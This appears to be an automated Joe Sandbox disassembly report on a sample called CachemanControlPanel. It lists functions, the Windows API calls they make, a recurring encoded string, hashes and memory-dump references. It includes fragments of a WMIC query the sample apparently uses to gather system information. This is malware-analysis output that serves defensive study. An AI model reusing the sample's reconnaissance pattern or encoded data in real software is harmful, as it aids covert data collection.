                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 2735977093-3176450862
                                                        • Opcode ID: 28630af12029844732587fc1ca7a6ee525355a27aa7019c0b227d08c4ccccc88
                                                        • Instruction ID: f4b3866a816ce089b5947586675732e6ce367cc0bb439e8c3c5ba19d5e3088ee
                                                        • Opcode Fuzzy Hash: 28630af12029844732587fc1ca7a6ee525355a27aa7019c0b227d08c4ccccc88
                                                        • Instruction Fuzzy Hash: D401647734031877E3204684AC02FB7379CCBC5B55F19007AFB055E2C1DAA3A8108279
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,0040F178,00000000), ref: 00420704
                                                        • malloc.MSVCRT ref: 00420714
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 00420731
                                                        • malloc.MSVCRT ref: 00420746
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004206D1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidemalloc
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 2735977093-3176450862
                                                        • Opcode ID: 4e6c7f4fe451c67c1e8009194e563fc1c50adab8e19c291f6d61bd2852b63332
                                                        • Instruction ID: 990851a164917dcec1a9a8c30d1f161f41bf450f97a8fe1959177edd6c8dde5a
                                                        • Opcode Fuzzy Hash: 4e6c7f4fe451c67c1e8009194e563fc1c50adab8e19c291f6d61bd2852b63332
                                                        • Instruction Fuzzy Hash: A601647B34131177E3206655AC42FB737ACCBC5B59F19007AFB015E2C1C6A3A800C679
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • memset.MSVCRT ref: 0040BD8C
                                                          • Part of subcall function 00420630: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,0040BBE4,00000000), ref: 00420661
                                                          • Part of subcall function 00420630: malloc.MSVCRT ref: 00420671
                                                          • Part of subcall function 00420630: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000), ref: 0042068B
                                                          • Part of subcall function 00420620: ??3@YAXPAX@Z.MSVCRT ref: 00420624
                                                        • strlen.MSVCRT ref: 0040BE4A
                                                        • HeapAlloc.KERNEL32(00000000,00000001,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,0040BEF9,00000000,00000002,00000000,0040895B,?,00000000,00000000), ref: 0040BE5D
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,0040BEF9,00000000,00000002,00000000,0040895B,?,00000000,00000000), ref: 0040BEBE
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040BD6F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharHeapMultiWide$??3@AllocFreemallocmemsetstrlen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1922441055-3176450862
                                                        • Opcode ID: a7949d3c7374cccf97a303ebfc1442db897773fb78bc4bc4e2a8b196ac99322e
                                                        • Instruction ID: d77bd93ffdbe98b8aaae46f08a288c859705130d0c9c5f6cda46591a52929e92
                                                        • Opcode Fuzzy Hash: a7949d3c7374cccf97a303ebfc1442db897773fb78bc4bc4e2a8b196ac99322e
                                                        • Instruction Fuzzy Hash: F54138702056C0E9F3168F28DC047A23F91AF55319F18607EE5805A3E3C3FE498187AE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • wcslen.MSVCRT ref: 00418835
                                                        • HeapAlloc.KERNEL32(02A80000,00000000,0000000A), ref: 00418859
                                                        • HeapReAlloc.KERNEL32(02A80000,00000000,00000000,0000000A), ref: 0041887D
                                                        • HeapFree.KERNEL32(02A80000,00000000,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,0040A04F,?,ABCDEF0123456789,00407B15,00000001,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188B4
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00418820
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$Alloc$Freewcslen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 2479713791-3176450862
                                                        • Opcode ID: d91023e457b6647fce4757e07e3148700fd969f97ad8b2eea91240fdf247e20b
                                                        • Instruction ID: c0afb1a15f72de34bd64a205038330ddf41e67d19a3b23b7f99008c7e74f6415
                                                        • Opcode Fuzzy Hash: d91023e457b6647fce4757e07e3148700fd969f97ad8b2eea91240fdf247e20b
                                                        • Instruction Fuzzy Hash: A6210B74A04209EFDB08DF94D994FAAB7B9FB48354F1081A9F9098B340D775EA81CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00418339,00000000,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?), ref: 0041806A
                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00418339,00000000,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21), ref: 00418081
                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00418339,00000000,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21), ref: 0041809D
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00418339,00000000,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?), ref: 004180BA
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00418058
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CriticalFreeHeapSection$EnterLeave
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1298188129-3176450862
                                                        • Opcode ID: 8298402a71231ff66aec90ad3fa0ceba738a7e07d5f705bb74bf9a5afe216a01
                                                        • Instruction ID: 704e1c12c3f959d1d7dbbc09bb1394a3284ccf85f589cfc2c2b50e3b05a4a768
                                                        • Opcode Fuzzy Hash: 8298402a71231ff66aec90ad3fa0ceba738a7e07d5f705bb74bf9a5afe216a01
                                                        • Instruction Fuzzy Hash: 4F017C76A0061EEBC7149F55DD04963BBACFB08791306022EA904C3610CB31E8A4CFE8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strstr$strlen
                                                        • String ID: ://
                                                        • API String ID: 1600229599-1869659232
                                                        • Opcode ID: fc335dbf6f4f73445ddf8089ea3ac1b63498fd613cf3bf87e8f8762eb244d875
                                                        • Instruction ID: 93ba1f561194dc4fd83d3bf3a3312234015b039d5ef331d6952857c7b9e9935c
                                                        • Opcode Fuzzy Hash: fc335dbf6f4f73445ddf8089ea3ac1b63498fd613cf3bf87e8f8762eb244d875
                                                        • Instruction Fuzzy Hash: 35E03036B09B312AD2295565BC42E4B5794EA45B74B21492FF804B67C0EA3C9C024ACD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,?,00403DEE,00000000,00000000,wmic, /FORMAT:List,004338DC, get ,00000000,00000007,004338DC,00000000,00430024,0000000E), ref: 0040B216
                                                        • CloseHandle.KERNEL32(?,?,?,00403DEE,00000000,00000000,wmic, /FORMAT:List,004338DC, get ,00000000,00000007,004338DC,00000000,00430024,0000000E), ref: 0040B221
                                                        • CloseHandle.KERNEL32(?,?,?,00403DEE,00000000,00000000,wmic, /FORMAT:List,004338DC, get ,00000000,00000007,004338DC,00000000,00430024,0000000E), ref: 0040B22C
                                                        • CloseHandle.KERNEL32(?,?,?,00403DEE,00000000,00000000,wmic, /FORMAT:List,004338DC, get ,00000000,00000007,004338DC,00000000,00430024,0000000E), ref: 0040B237
                                                        • EnterCriticalSection.KERNEL32(004341B8,?,?,00403DEE,00000000,00000000,wmic, /FORMAT:List,004338DC, get ,00000000,00000007,004338DC,00000000,00430024,0000000E), ref: 0040B23F
                                                        • LeaveCriticalSection.KERNEL32(004341B8,?,?,00403DEE,00000000,00000000,wmic, /FORMAT:List,004338DC, get ,00000000,00000007,004338DC,00000000,00430024,0000000E), ref: 0040B253
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 10009202-0
                                                        • Opcode ID: 8d0b667200de551d9d601715a835257667999377c8bcea5d45c4e7db0e80d622
                                                        • Instruction ID: 58bab87571f8a7adf22744d209e2c3736f371e4e35ac808e4962eb905e504322
                                                        • Opcode Fuzzy Hash: 8d0b667200de551d9d601715a835257667999377c8bcea5d45c4e7db0e80d622
                                                        • Instruction Fuzzy Hash: A0F05432000601EBC72A7F15EC08BABB7E5EF94361F15893EE055510B087B86886DF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TlsAlloc.KERNEL32(0040B74B,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00407B37,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,004072B4,0000000C), ref: 0040B609
                                                        • HeapAlloc.KERNEL32(00000000,00000090,74786580,0040B74B,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00407B37,00000001,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0040B62C
                                                        • TlsSetValue.KERNEL32(00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00407B37,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,004072B4,0000000C), ref: 0040B639
                                                        • GetCurrentThreadId.KERNEL32 ref: 0040B63F
                                                        • GetTickCount.KERNEL32 ref: 0040B647
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
